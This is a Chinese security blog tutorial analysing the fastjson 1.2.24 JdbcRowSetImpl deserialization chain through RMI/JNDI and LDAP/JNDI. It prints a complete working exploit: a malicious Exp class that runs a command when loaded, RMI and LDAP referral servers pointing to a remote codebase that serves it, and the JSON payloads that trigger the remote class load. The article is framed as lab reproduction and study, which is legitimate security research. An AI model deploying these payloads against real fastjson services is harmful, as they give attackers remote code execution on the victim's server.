- 1weblogic_11g集群部署_linux_weblogic11g集群部署
- 2Eclipse C/C++ 开发环境的安装与汉化包安装经验笔记_eclipse (cdt)安装
- 3Stable Diffusion教程:模型种类介绍_stable diffusion模型分类
- 4《自然语言处理入门》笔记_自然语言处理知识点
- 5【深度学习】煮酒论英雄:深度学习CV领域最瞩目的top成果总结
- 60005 跳跃游戏Ⅱ
- 7揭秘【Cloud Native】安全:当灵活性与安全性碰撞时,我们该如何应对?_cloud native 安全优势
- 8数据结构——二叉树(4)——链式二叉树_链式二叉树 右子树
- 9Android Jetpack组件 Compose 使用介绍_android compose
- 10Docker_可信镜像中心
14-java安全——fastjson1.2.24反序列化JdbcRowSetImpl利用链分析_jdbcrowsetimpt反序列化分解
赞
踩
fastjson在1.2.24版本中,除了TemplatesImpl链之外,还有一个JdbcRowSetImpl利用链,JdbcRowSetImpl链有两种利用方式:一种是RMI和JNDI利用方式,另一种是JNDI和LDAP利用方式,关于JNDI的相关概念之前在java安全基础中已经介绍过了,而且底层原理已经分析过了,大家可自行参考以下文章。
1. RMI和JNDI利用方式
漏洞复现环境:
jdk7u80
fastjson1.2.24
RMI和JNDI利用方式对于jdk版本的限制比较大:JDK的版本必须低于这几个版本:6u141、7u131、8u121,本次漏洞复现使用的是jdk7u80版本
首先是基于JNDI和RMI的JdbcRowSetImpl利用链,新建一个maven项目,在pom.xml文件中引入fastjson1.2.24版本的依赖
- <dependencies>
- <dependency>
- <groupId>com.alibaba</groupId>
- <artifactId>fastjson</artifactId>
- <version>1.2.24</version>
- </dependency>
- </dependencies>
在此之前我们先回顾一下JNDI注入
- public class JndiTest {
- public static void main(String[] args) throws NamingException {
- //指定RMI服务资源的标识
- String jndi_uri = "rmi://127.0.0.1:10086/test";
- //构建jndi上下文环境
- InitialContext initialContext = new InitialContext();
- //查找标识关联的RMI服务
- initialContext.lookup(jndi_uri);
- }
- }
在这个示例程序中,如果RMI客户端中调用lookup函数指定RMI服务的jndi_uri变量可控的话,攻击者就可以通过篡改RMI客户端中jndi_uri变量的值,从而把RMI客户端导向到其他地方并加载一个恶意类Exp就可以造成命令执行,这样客户端就有可能被攻击。
先构造一个恶意类Exp
- package com.test;
-
- import java.io.IOException;
-
- public class Exp{
-
- static {
- try {
- Runtime.getRuntime().exec("calc");
- } catch (IOException e) {
- e.printStackTrace();
- }
- }
-
- }
构造一个RMI服务端,将RMI客户端导向该处,加载恶意类Exp
- package com.test;
-
- import com.sun.jndi.rmi.registry.ReferenceWrapper;
-
- import javax.naming.NamingException;
- import javax.naming.Reference;
- import java.rmi.AlreadyBoundException;
- import java.rmi.RemoteException;
- import java.rmi.registry.LocateRegistry;
- import java.rmi.registry.Registry;
-
- /*
- 基于RMI和JNDI利用方式:fastjson反序列化JdbcRowSetImpl利用链分析
- */
- public class RMIServer {
- public static void main(String[] args) throws NamingException, RemoteException, AlreadyBoundException {
- //标识符
- String jndi_uri = "http://192.168.0.35:8081/";
- //注册中心
- Registry registry = LocateRegistry.createRegistry(10086);
- //标识符与与恶意对象关联
- Reference reference = new Reference("Exp", "Exp", jndi_uri);
- ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
- //将名称与恶意对象实体进行绑定注册
- registry.bind("Exp",referenceWrapper);
- System.out.println("RMI服务端已启动......");
- }
- }
RMI客户端
- package com.test;
-
- import com.alibaba.fastjson.JSON;
-
- /*
- 基于RMI和JNDI利用方式:fastjson反序列化JdbcRowSetImpl利用链分析
- */
- public class RMIClient {
-
- public static void main(String[] argv){
- String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://192.168.0.35:10086/Exp\", \"autoCommit\":true}";
- JSON.parse(payload);
- }
- }
RMI客户端通过fastjson反序列化了一个com.sun.rowset.JdbcRowSetImpl类,该类在反序列化过程中会调用lookup方法发送一个RMI请求(rmi://127.0.0.1:10086/Exp)获取Exp类并加载,当RMI客户端加载Exp类就会执行命令调出计算器。
先启动RMI服务端,再启动RMI客户端,我们从web服务器中可以看到RMI客户端确实从web服务器上获取了恶意类Exp
RMIClient和RMIServer通信过程如下:
我们可以把客户端和服务端的通信过程总共分为6部分:
第一部分表示RMIClient和RMIServer建立RMI通信的过程(即tcp三次握手)
第二部分为RMIClient和RMIServer之间正式通信过程
第三部分表示RMIClient和web服务器建立通信过程(也是tcp三次握手)
第四部部分表示RMIClient和web服务器之间正式通信过程,RMIClient会从web服务器中获取恶意类Exp到本地并加载
第五部分为RMIClient和web服务器之间的tcp链接关闭
第六部分为RMIClient和RMIServer之间的RMI通信的tcp链接关闭,由于这里我强制把RMIClient程序停止了,客户端会发送一个RST段重置TCP连接
具体的通信过程我们不再深入分析,大家可以参考开头的几篇文章。
接下来我们继续分析一下JdbcRowSetImpl利用链是如何触发漏洞的,通过RMIClient中的payload我们知道fastjson在解析json数据反序列化时会调用对象的setter方法设置属性的值,换句话说,fastjson对JdbcRowSetImpl类反序列化时会调用dataSourceName属性的setter方法。
- public void setDataSourceName(String var1) throws SQLException {
- //判断属性的值是否为null
- if (this.getDataSourceName() != null) {
- if (!this.getDataSourceName().equals(var1)) {
- String var2 = this.getDataSourceName();
- super.setDataSourceName(var1);
- this.conn = null;
- this.ps = null;
- this.rs = null;
- this.propertyChangeSupport.firePropertyChange("dataSourceName", var2, var1);
- }
- } else {
- //如果为null设置属性的值
- super.setDataSourceName(var1);
- //设置属性dataSourceName
- this.propertyChangeSupport.firePropertyChange("dataSourceName", (Object)null, var1);
- }
-
- }
JdbcRowSetImpl类首先会调用getDataSourceName判断属性的值是否为null,如果为null则调用父类的setDataSourceName方法设置值,var1变量的值就是rmi://192.168.0.35:10086/Exp
JdbcRowSetImpl的父类BaseRowSet的setDataSourceName方法
- public void setDataSourceName(String name) throws SQLException {
-
- if (name == null) {
- dataSource = null;
- } else if (name.equals("")) {
- throw new SQLException("DataSource name cannot be empty string");
- } else {
- dataSource = name;
- }
-
- URL = null;
- }
setDataSourceName方法会对name参数进行为null或为空字符串的校验,然后设置dataSource 属性的值为rmi://192.168.0.35:10086/Exp
然后JdbcRowSetImpl类调用了firePropertyChange方法将dataSourceName封装到了一个PropertyChangeEvent对象中。
- public void firePropertyChange(String propertyName, Object oldValue, Object newValue) {
- if (oldValue == null || newValue == null || !oldValue.equals(newValue)) {
- firePropertyChange(new PropertyChangeEvent(this.source, propertyName, oldValue, newValue));
- }
- }
我们继续跟踪PropertyChangeEvent的构造,可以看到dataSourceName封装到了PropertyChangeEvent中的propertyName属性中,newValue中存储的就是dataSourceName的值。
为什么要将dataSourceName属性的值设置为rmi://192.168.0.35:10086/Exp?因为JdbcRowSetImpl类调用了一个connect方法获取数据库连接池
- protected Connection connect() throws SQLException {
- if (this.conn != null) {
- return this.conn;
- } else if (this.getDataSourceName() != null) {
- try {
- InitialContext var1 = new InitialContext();
- //调用了lookup方法获取数据库连接
- DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName());
- return this.getUsername() != null && !this.getUsername().equals("") ? var2.getConnection(this.getUsername(), this.getPassword()) : var2.getConnection();
- } catch (NamingException var3) {
- throw new SQLException(this.resBundle.handleGetObject("jdbcrowsetimpl.connect").toString());
- }
- } else {
- return this.getUrl() != null ? DriverManager.getConnection(this.getUrl(), this.getUsername(), this.getPassword()) : null;
- }
- }
connect方法内部实际上是调用了一个lookup方法通过RMI方式获取数据库连接池,lookup方法中的参数实际上是调用了父类的getDataSourceName方法返回数据库连接池的rmi标识,由于我们数据库连接池的rmi标识篡改成了恶意类,因此lookup方法会从rmi标识中获取RMI服务指定的恶意类Exp并加载,当lookup方法内部加载Exp类就会触发漏洞。
getDataSourceName方法是从dataSource属性获取的RMI的标识,而dataSource属性的值中正好是通过BaseRowSet类的setDataSourceName方法设置的
然后lookup方法内部经过一系列的调用,最终在decodeObject方法内部调用了一个getObjectInstance方法实例化Exp类时会执行命令调出计算器,并且这还会抛出NamingException异常,具体的分析过程大家可参考开头提供的几篇文章,这里不再赘述。
2. JNDI和LDAP利用方式
在实际的场景中对于RMI和JNDI利用方式的限制比较大,而JNDI和LDAP利用方式对于JDK版本的限制就没有那么大了。
JNDI和LDAP利用的JDK版本:6u211、7u201、8u191
漏洞复现环境:
jdk7u80
LDAP客户端,192.168.0.60(win7)
LDAP服务端,192.168.0.35(win10)
在LDAP服务端的maven项目中pom.xml文件引入LDAP服务的相关依赖:
- <dependency>
- <groupId>commons-codec</groupId>
- <artifactId>commons-codec</artifactId>
- <version>1.12</version>
- </dependency>
-
- <dependency>
- <groupId>commons-io</groupId>
- <artifactId>commons-io</artifactId>
- <version>2.5</version>
- </dependency>
-
- <dependency>
- <groupId>com.unboundid</groupId>
- <artifactId>unboundid-ldapsdk</artifactId>
- <version>4.0.9</version>
- <scope>test</scope>
- </dependency>
我们来看一下JNDI和LDAP利用方式的代码,首先是LDAP服务端:
- package com.test;
-
- import com.unboundid.ldap.listener.InMemoryDirectoryServer;
- import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
- import com.unboundid.ldap.listener.InMemoryListenerConfig;
- import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
- import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
- import com.unboundid.ldap.sdk.Entry;
- import com.unboundid.ldap.sdk.LDAPException;
- import com.unboundid.ldap.sdk.LDAPResult;
- import com.unboundid.ldap.sdk.ResultCode;
-
- import javax.net.ServerSocketFactory;
- import javax.net.SocketFactory;
- import javax.net.ssl.SSLSocketFactory;
- import java.net.InetAddress;
- import java.net.MalformedURLException;
- import java.net.URL;
-
- /**
- * @auther songly_
- * @data 2021/9/1 9:43
- */
-
- /*
- 基于JNDI和LDAP利用方式:fastjson反序列化JdbcRowSetImpl利用链分析
- */
- public class LDAPServer {
- private static final String LDAP_BASE = "dc=example,dc=com";
-
- public static void main(String[] argsx) {
- String[] args = new String[]{"http://192.168.0.35:8081/#Exp", "10086"};
- int port = 0;
- if (args.length < 1 || args[0].indexOf('#') < 0) {
- System.err.println(LDAPServer.class.getSimpleName() + " <codebase_url#classname> [<port>]"); //$NON-NLS-1$
- System.exit(-1);
- } else if (args.length > 1) {
- port = Integer.parseInt(args[1]);
- }
- try {
- InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
- config.setListenerConfigs(new InMemoryListenerConfig(
- "listen", //$NON-NLS-1$
- InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
- port,
- ServerSocketFactory.getDefault(),
- SocketFactory.getDefault(),
- (SSLSocketFactory) SSLSocketFactory.getDefault()));
- config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[0])));
- InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
- System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
- ds.startListening();
- } catch (Exception e) {
- e.printStackTrace();
- }
- }
- private static class OperationInterceptor extends InMemoryOperationInterceptor {
- private URL codebase;
-
- public OperationInterceptor(URL cb) {
- this.codebase = cb;
- }
-
- @Override
- public void processSearchResult(InMemoryInterceptedSearchResult result) {
- String base = result.getRequest().getBaseDN();
- Entry e = new Entry(base);
- try {
- sendResult(result, base, e);
- } catch (Exception e1) {
- e1.printStackTrace();
- }
- }
- protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e) throws LDAPException, MalformedURLException {
- URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
- System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
- e.addAttribute("javaClassName", "foo");
- String cbstring = this.codebase.toString();
- int refPos = cbstring.indexOf('#');
- if (refPos > 0) {
- cbstring = cbstring.substring(0, refPos);
- }
- e.addAttribute("javaCodeBase", cbstring);
- e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
- e.addAttribute("javaFactory", this.codebase.getRef());
- result.sendSearchEntry(e);
- result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
- }
- }
- }
LDAP客户端:
- package com.test;
-
- import com.alibaba.fastjson.JSON;
-
- /**
- * @auther songly_
- * @data 2021/9/1 9:51
- */
-
- /*
- 基于JNDI和LDAP利用方式:fastjson反序列化JdbcRowSetImpl利用链分析
- */
- public class LDAPClient {
- public static void main(String[] argv){
- String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:10086/Exp\", \"autoCommit\":true}";
- JSON.parse(payload);
- }
- }
LDAPClient中基本没什么变化,不过是把rmi改成ldap服务。
LDAP客户端和LDAP服务端通信如下:
客户端会从web服务器下载恶意类Exp到本地并加载,关于通信过程可以参考RMI和JNDI利用方式,流程基本上差不多。
